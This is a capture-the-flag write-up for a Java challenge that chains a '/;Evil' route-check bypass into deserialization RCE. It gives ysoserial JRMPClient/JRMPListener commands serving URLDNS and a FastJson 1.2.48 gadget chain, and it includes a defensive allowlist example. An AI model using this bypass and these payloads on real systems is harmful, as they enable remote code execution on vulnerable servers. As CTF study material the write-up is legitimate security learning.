
Web-ezJava Challenge Writeup

Route bypass

The payload http://localhost/;Evil bypasses the check if (path.startsWith("/Evil")):

@ResponseBody
@RequestMapping({"/Evil"})
public String Evil(HttpServletRequest request, HttpServletResponse response) throws IOException, ClassNotFoundException {
    String path = request.getRequestURI();
    // Check on the raw request URI; the /;Evil payload above gets past it
    if (path.startsWith("/Evil"))
        return "nonono!!!";
    String base = request.getParameter("base");
    // Deserialization sink: base64 -> EInputStream -> readObject()
    EInputStream in = new EInputStream(new ByteArrayInputStream(Base64.getDecoder().decode(base)));
    Object a = in.readObject();
    return "OK";
}

EInputStream

EInputStream in = new EInputStream(new ByteArrayInputStream(Base64.getDecoder().decode(base)));

We can see that the route base64-decodes the base parameter and hands it to EInputStream. For local debugging I swapped it for a plain ObjectInputStream[1]:

ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(Base64.getDecoder().decode(base)));

With that change we get RCE directly (screenshot in the original post).

So the deserialization point is obvious, but some bypass is needed, because the filtering is implemented by overriding ObjectInputStream::resolveClass[2].
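As an added example (not the challenge's EInputStream, whose source is not shown here), this is what the resolveClass hook looks like when it is written as an allowlist rather than a denylist: every class descriptor in the stream is checked before the object is instantiated, so a gadget entry class such as javax.management.BadAttributeValueExpException (the start of the chain used later in this writeup) is rejected before any readObject logic runs. The allowed type names and the sample objects are assumptions constructed for the demo.

```java
import java.io.*;
import java.util.*;

// Allowlist-based ObjectInputStream: admits only the types the endpoint expects.
public class SafeInputStream extends ObjectInputStream {
    // Assumed set for the demo; a real endpoint lists exactly the classes it deserializes.
    private static final Set<String> ALLOWED = new HashSet<>(Arrays.asList(
            "java.util.ArrayList", "java.lang.Integer", "java.lang.Number"));

    public SafeInputStream(InputStream in) throws IOException { super(in); }

    // Called for every class descriptor read from the stream, before the
    // corresponding object is created, so blocked classes never run readObject().
    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc)
            throws IOException, ClassNotFoundException {
        if (!ALLOWED.contains(desc.getName())) {
            throw new InvalidClassException(desc.getName(), "not on deserialization allowlist");
        }
        return super.resolveClass(desc);
    }

    // Same shape as the challenge route: base64 decode, then readObject().
    public static Object readBase64(String base) throws IOException, ClassNotFoundException {
        byte[] raw = Base64.getDecoder().decode(base);
        try (SafeInputStream in = new SafeInputStream(new ByteArrayInputStream(raw))) {
            return in.readObject();
        }
    }

    static String serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) { oos.writeObject(o); }
        return Base64.getEncoder().encodeToString(bos.toByteArray());
    }

    public static void main(String[] args) throws Exception {
        // Constructed inputs: an expected type, then the gadget entry class from the writeup.
        System.out.println(readBase64(serialize(new ArrayList<>(Arrays.asList("a", "b")))));
        try {
            readBase64(serialize(new javax.management.BadAttributeValueExpException("x")));
        } catch (InvalidClassException e) {
            System.out.println("blocked: " + e.getMessage());
        }
    }
}
```

The JDK's built-in equivalent is the JEP 290 ObjectInputFilter (java.io.ObjectInputFilter from JDK 9, backported to 8u121 as sun.misc.ObjectInputFilter), which the JRMPClient_bypass_jep_jdk241 payload name further down refers to.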

Gadget

URLDNS

First test with the URLDNS gadget:

java -jar ysoserial.jar JRMPClient "localhost:1099"|base64
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 URLDNS "http://dnslog"

The attack succeeds (screenshot in the original post).


RCE

So, aiming for RCE, I went through the lib directory: the local service has no directly usable gadget, and trying a few CommonsCollections (cc) gadgets produced an error:

ERROR 1 --- [nio-8080-exec-9] o.a.c.c.C.[.[.[/].[dispatcherServlet]    : Servlet.service() for servlet [dispatcherServlet] in context with path [] threw exception [Request processing failed; nested exception is java.lang.IllegalArgumentException: Illegal base64 character 20] with root cause

java.lang.IllegalArgumentException: Illegal base64 character 20
	at java.util.Base64$Decoder.decode0(Base64.java:714) ~[na:1.8.0_171]
···
···
	at java.lang.Thread.run(Thread.java:748) [na:1.8.0_171]

Solution

Looking back at the dependencies:

<dependency>
    <groupId>com.alibaba</groupId>
    <artifactId>fastjson</artifactId>
    <version>1.2.48</version>
</dependency>

I found a tutorial describing a second-stage deserialization through FastJson[3].

Adding the payload

Error when building the added FastJson payload:

[ERROR] /Users/bin4xin/.../FastJson.java:[3,27] 错误: 程序包com.alibaba.fastjson不存在

Add the jar to the local Maven repository:

mvn install:install-file -Dfile=/Users/bin4xin/path/to/fastjson-1.2.48.jar -DgroupId=com.alibaba -DartifactId=fastjson -Dversion=1.2.48 -Dpackaging=jar
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar
Y SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
     ···
     FastJson
     ···
     JRMPClient_bypass_jep_jdk241

Exploit

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient_bypass_jep_jdk241 "127.0.0.1:1099"|base64
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 FastJson "open /System/Applications/Calculator.app"

Call chain:

javax.management.BadAttributeValueExpException#readObject
com.alibaba.fastjson.JSON#toJSONString
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl#getOutputProperties

Error:

Servlet.service() for servlet [dispatcherServlet] in context with path [] threw exception [Request processing failed; nested exception is java.lang.IllegalArgumentException: Illegal base64 character 20] with root cause

java.lang.IllegalArgumentException: Illegal base64 character 20
        at java.util.Base64$Decoder.decode0(Base64.java:714) ~[na:1.8.0_181]

Fix (shown only as a screenshot in the original post).

Success (screenshot in the original post).

REF

That's all; done.